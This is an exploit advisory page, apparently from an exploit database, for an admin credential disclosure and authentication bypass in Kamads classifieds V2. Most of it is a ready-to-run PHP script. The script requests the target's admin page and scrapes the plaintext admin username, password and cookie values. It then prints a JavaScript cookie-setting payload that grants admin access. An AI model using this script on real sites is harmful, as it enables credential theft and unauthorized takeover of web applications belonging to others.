Kamads classifieds 2 Admin Disclosure & Auth bypass

2012.08.09
Credit: Mr.tro0oqy
Risk: High
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

<?php if ($argc < 2) { echo "\n+-----------------------------------------------------------------+\n"; echo "| Kamads classifieds V2 admin Disclosure & (AuthBypass) insecure exploit |\n"; echo "| By Mr.tro0oqy |\n"; echo "| uxxd@hotmail.com |\n"; echo "+-----------------------------------------------------------------+\n"; print "\nUsage........: php $argv[0] <host><path><admin.php>\n"; print "\nex...........: php $argv[0] http://www.target.com/V2A_XHTML/admin/admin.php\n"; die(); }else { $ch = curl_init(); curl_setopt($ch,CURLOPT_URL,"$argv[1]"); $op1 = curl_setopt($ch,CURLOPT_RETURNTRANSFER,true); curl_setopt($ch,CURLOPT_USERAGENT,"Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)"); curl_setopt($ch,COOKIESESSION,true); curl_setopt($ch,CUSTOMREQUEST,"get"); $x = curl_exec($ch); if ($t = stristr($x,"username = ") and stristr($x,"password = ")) { echo "\n"; echo "\n"; echo $new = substr($t,0,94); if ($co=stristr($x,"theCookieName") and $co2=stristr($x,"theCookieValue")) { echo "\n"; echo "\n"; echo $new2 = substr($co,0,35); echo "\n"; echo $new3 =substr($co2,0,40); echo "\n"; echo "\n"; $ja = substr($new2,17,15); echo "\n"; $ja2 = substr($new3,18,18); echo "\n"; echo "\n"; echo "\n"; echo $exploit = "javascript:document.cookie=\"$ja=$ja2;path=/\";"; echo "\n"; echo "\n"; echo "\n"; } }else { echo "not found"; } } ?>


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top